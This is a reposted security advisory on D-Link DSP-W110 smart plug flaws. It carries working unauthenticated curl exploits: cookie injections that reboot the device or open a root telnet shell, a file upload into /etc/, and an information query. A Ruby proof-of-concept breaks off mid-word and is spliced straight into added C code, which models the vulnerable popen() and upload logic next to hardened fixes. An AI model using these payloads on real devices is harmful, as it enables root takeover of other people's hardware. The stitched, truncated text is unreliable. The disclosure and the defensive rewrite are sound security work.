D-Link DSP-W110 Command Execution / SQL Injection / File Upload

Posted 2019-08-05 08:08 by nipc

Vulnerability information
Vulnerability ID: 1316
CVE ID: none allocated
Vulnerability type: -
Source: cxs (cxsecurity.com)
Published: 2015-06-12
CVSS
CVSS score: -
Severity: High
Exploit range: -
Attack complexity: -
Authentication level: -
Vulnerability description

Source: cxsecurity WLB-2015060066, http://cxsecurity.com/issue/WLB-2015060066
Title: D-Link DSP-W110 Command Execution / SQL Injection / File Upload
Date: 2015-06-12
Author: Peter Adkins
Risk: High
CWE: CWE-89 (SQL Injection), CWE-264 (Permissions, Privileges, and Access Controls), CWE-78 (OS Command Injection)
CVE: N/A
Local: No
Remote: Yes

>> D-Link DSP-W110 - multiple vulnerabilities

----
Discovered by:
----
Peter Adkins <peter.adkins@kernelpicnic.net>

----
Access:
----
Local network; unauthenticated access.

----
Tracking and identifiers:
----
CVE - None allocated.

----
Platforms / Firmware confirmed affected:
----
D-Link DSP-W110 (Rev A) - v1.05b01

----
Notes:
----
* There are a number of references to both 'miiiCasa' and 'fitivision' throughout the firmware, which may indicate that these vulnerabilities are also present in other devices not listed in this document.

* A copy of this document, the proof of concept below and a more detailed write-up are available via GitHub:

  * https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110

----
Arbitrary command execution / SQL Injection
----

Patches made to lighttpd by the vendor expose the device to both SQL injection and, more interestingly, arbitrary code execution. This is due to improper sanitization of data supplied by a client.

As the lighttpd service provides endpoints that can be accessed without authentication, it gives an attacker a vector to execute arbitrary commands on the device as the root user via an HTTP request, without any authentication credentials.
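The following C program is an added example and is not code from the advisory or from the DSP-W110 firmware. It models the chain the advisory describes (a cookie value of any name is sprintf()'d into an SQL query string, which is then executed through popen(), with the cookie limited to 19 characters by the buffer) and places a hardened version beside it. The format string, the buffer size, the function names and the assumed token alphabet are all assumptions; where the firmware runs sqlite3 through the shell, this model runs echo so that it executes without sqlite3 installed, which leaves the injection behaviour unchanged.

```c
/* Added example: model of the cookie -> sprintf() -> popen() chain and a
 * hardened version. Not from the advisory or the DSP-W110 firmware; format
 * string, buffer size, names and token alphabet are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_COOKIE_LEN 19   /* limit stated by the advisory */
#define CMD_BUF_SIZE   256  /* assumed; the real buffer size is not public */

/* PoC cookie values from the advisory, plus a benign one constructed here. */
static const char PAYLOAD_REBOOT[] = "'`reboot`";
static const char PAYLOAD_SHELL[]  = "`telnetd -l/bin/sh`";
static const char PAYLOAD_BENIGN[] = "'`echo pwned`";

/* Vulnerable pattern (assumed shape): the cookie is interpolated into a
 * command line that is later run by /bin/sh via popen(). The firmware calls
 * sprintf(); snprintf() is used here only so this model cannot overflow, which
 * changes nothing about the injection. The real command runs sqlite3; this one
 * echoes the query so the example runs without sqlite3 installed. */
int build_session_cmd_vuln(const char *cookie, char *cmd, size_t cmd_size) {
    int n = snprintf(cmd, cmd_size,
                     "echo \"SELECT 1 FROM session WHERE token='%s'\"", cookie);
    return (n < 0 || (size_t)n >= cmd_size) ? -1 : 0;
}

/* Run the command the way the firmware does and capture what the shell prints.
 * With PAYLOAD_BENIGN the shell executes `echo pwned` inside the double-quoted
 * query, and the leading ' closes the SQL string literal: both bugs at once. */
int run_session_cmd(const char *cmd, char *out, size_t out_size) {
    FILE *fp = popen(cmd, "r");
    if (fp == NULL) return -1;
    size_t got = fread(out, 1, out_size - 1, fp);
    out[got] = '\0';
    return pclose(fp) == -1 ? -1 : 0;
}

/* Hardened: allow-list the token before it is used anywhere. Assumed token
 * shape: 1..MAX_COOKIE_LEN ASCII letters/digits. Quotes, backticks, $(), ;
 * and whitespace can then never reach SQL or a shell. */
int session_token_is_valid(const char *token) {
    size_t len = strlen(token);
    if (len == 0 || len > MAX_COOKIE_LEN) return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)token[i])) return 0;
    return 1;
}

/* Hardened: the token never becomes part of SQL text or a command line. The
 * query is a fixed prepared statement; the caller binds the token to '?' with
 * sqlite3_bind_text() (libsqlite3 is not linked here, so only the text is
 * produced). popen() of a shell is replaced entirely by the in-process API. */
int build_session_query_safe(const char *cookie, char *query, size_t query_size) {
    if (!session_token_is_valid(cookie)) return -1;
    int n = snprintf(query, query_size, "SELECT 1 FROM session WHERE token=?");
    return (n < 0 || (size_t)n >= query_size) ? -1 : 0;
}

int main(void) {
    char cmd[CMD_BUF_SIZE], out[256];
    if (build_session_cmd_vuln(PAYLOAD_BENIGN, cmd, sizeof cmd) == 0 &&
        run_session_cmd(cmd, out, sizeof out) == 0)
        printf("vulnerable path, shell output: %s", out);
    printf("payload %s is %zu bytes (limit %d)\n", PAYLOAD_SHELL,
           strlen(PAYLOAD_SHELL), MAX_COOKIE_LEN);
    printf("validator: reboot payload -> %d, shell payload -> %d, real token -> %d\n",
           session_token_is_valid(PAYLOAD_REBOOT),
           session_token_is_valid(PAYLOAD_SHELL),
           session_token_is_valid("a1b2c3d4e5f6a7b8"));
    return 0;
}
```

Two points are worth checking against the advisory with this model: the telnetd payload is exactly 19 bytes, which is why it fits the stated limit, and the benign payload shows that a single quote plus backticks inside the cookie both closes the SQL literal and gets executed by the shell, so the SQL injection and the command execution are the same bug seen from two sides. The allow-list validator alone already rejects every PoC payload; the prepared statement removes the shell from the path so that no validator bypass can ever reach it.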

POC

----
Arbitrary command execution / SQL Injection
----

The root cause of this issue is that the contents of an HTTP Cookie, with any name, are passed verbatim to a sprintf() call in order to form an SQL query used to validate existing client sessions. By simply performing an HTTP request against the device with a correctly formatted cookie set, arbitrary SQL can be executed against the internal SQLite database.

Further to this, as the resulting SQL query is passed to a popen() call in order to execute it, arbitrary commands can also be run on the device as the root user. That said, due to the length of the allocated buffer, the value of the cookie cannot exceed 19 characters. However, as shown below, 19 characters is exactly enough to pop a shell on the device.

# Reboot the device. The backticks are escaped (or single-quoted) so that the
# local shell passes them to the device literally instead of expanding them.
curl 192.168.1.3/ --cookie "terribleness='\`reboot\`"

# Spawn a root shell (telnet).
curl 192.168.1.3/ --cookie 'terribleness=`telnetd -l/bin/sh`'

----
Arbitrary file upload
----

Patches made to lighttpd by the vendor expose the device to arbitrary file upload attacks. Unfortunately, the only 'filtering' on this resource appears to be a sprintf() call which statically prefixes a submitted 'dev' argument with '/www'. However, if an HTTP request is performed without a 'dev' argument at all, the sprintf() call is never reached, and a fully-qualified path can be provided in the 'path' parameter, bypassing the upload path restriction.

As a result, this resource can be used to upload files to any location on the filesystem of devices running vulnerable firmware versions, without authentication.

# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl -X POST -i -F name=@test.txt --http1.0 '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'

----
Diagnostic Information
----

Patches made to lighttpd by the vendor of this device allow an attacker to query the device, without authentication, for the following information:

* Current WLAN SSIDs
* Current WLAN channels
* LAN and WAN MAC addresses
* Current firmware version information
* Hardware version information

Although this is not sensitive information, it may allow for identification of devices running vulnerable firmware versions.

# Information query.
curl 192.168.1.3/mplist.txt

----
Ruby PoC
----

# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'

# Set defaults and parse command line arguments.
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80

OptionParser.new do |option|
  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
    options[:addr] = a
  end
  option.on("--port [PORT]", "Destination TCP port") do |p|
    options[:port] = p
  end
  option.parse!
end

# Define which actions we will be using.
actions = [
  {
    :name => "Get device information",
    :call => "txt_parser",
    :path => "mplist.txt",
  },
  {
    :name => "Snatch con
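The following C program is an added example and is not code from the advisory or from the DSP-W110 firmware. It models the upload-path logic described in the "Arbitrary file upload" section above (the '/www' prefix is applied by sprintf() only when a 'dev' argument is present, so omitting 'dev' lets 'path' name any directory) and shows a hardened replacement that confines every upload to the web root. The function names, the output buffer size and the way 'path' is combined with 'dev' are assumptions; the advisory does not describe them.

```c
/* Added example: model of the upload-path logic from the "Arbitrary file
 * upload" section and a hardened replacement. Not from the advisory or the
 * DSP-W110 firmware; function names and how 'path' is combined with 'dev'
 * are assumptions. */
#include <stdio.h>
#include <string.h>

#define WEB_ROOT     "/www"
#define OUT_PATH_MAX 256

/* Vulnerable pattern (assumed shape). dev/path are request parameters; NULL
 * means absent. The '/www' prefix is only applied when 'dev' is present, so
 * omitting it lets 'path' name any directory on the device. */
int resolve_upload_dir_vuln(const char *dev, const char *path,
                            char *out, size_t out_size) {
    int n;
    if (dev != NULL) {
        n = snprintf(out, out_size, WEB_ROOT "%s", dev);  /* the prefixing sprintf() */
    } else if (path != NULL) {
        n = snprintf(out, out_size, "%s", path);          /* used verbatim */
    } else {
        return -1;
    }
    return (n < 0 || (size_t)n >= out_size) ? -1 : 0;
}

/* Hardened: one code path whatever parameters are present. The client supplies
 * a path relative to WEB_ROOT; it is normalised lexically ("", "." and ".."
 * components) and rejected, not clamped, if it tries to climb above the root.
 * Lexical normalisation needs no filesystem and is deterministic; on a real
 * device also run realpath() on the final directory to defeat symlinks. */
int resolve_upload_dir_safe(const char *path, char *out, size_t out_size) {
    const size_t root_len = strlen(WEB_ROOT);
    if (path == NULL || root_len + 1 > out_size) return -1;
    memcpy(out, WEB_ROOT, root_len);
    size_t len = root_len;                       /* out[0..len) is built so far */
    const char *p = path;
    while (*p != '\0') {
        while (*p == '/') p++;                   /* collapse separators */
        if (*p == '\0') break;
        const char *start = p;
        while (*p != '\0' && *p != '/') p++;
        size_t clen = (size_t)(p - start);
        if (clen == 1 && start[0] == '.') continue;
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            if (len == root_len) return -1;      /* would escape WEB_ROOT */
            while (out[len - 1] != '/') len--;   /* drop last component... */
            len--;                               /* ...and its separator */
            continue;
        }
        if (len + 1 + clen >= out_size) return -1;
        out[len++] = '/';
        memcpy(out + len, start, clen);
        len += clen;
    }
    out[len] = '\0';
    return 0;
}

int main(void) {
    char out[OUT_PATH_MAX];
    /* Constructed inputs: the advisory's /etc/ target plus two traversal shapes. */
    const char *tests[] = { "/etc/", "../../etc/passwd", "uploads//./img/.." };
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++) {
        int v = resolve_upload_dir_vuln(NULL, tests[i], out, sizeof out);
        printf("vuln  path=%-18s -> %s\n", tests[i], v == 0 ? out : "(rejected)");
        int s = resolve_upload_dir_safe(tests[i], out, sizeof out);
        printf("safe  path=%-18s -> %s\n", tests[i], s == 0 ? out : "(rejected)");
    }
    return 0;
}
```

The design point is that the vulnerable version has two code paths and the restriction lives on only one of them; the hardened version has a single path that always starts from WEB_ROOT, so there is no parameter combination that skips the check. Rejecting a ".." that would climb above the root, rather than silently clamping it to the root, also gives the device a clear signal to log.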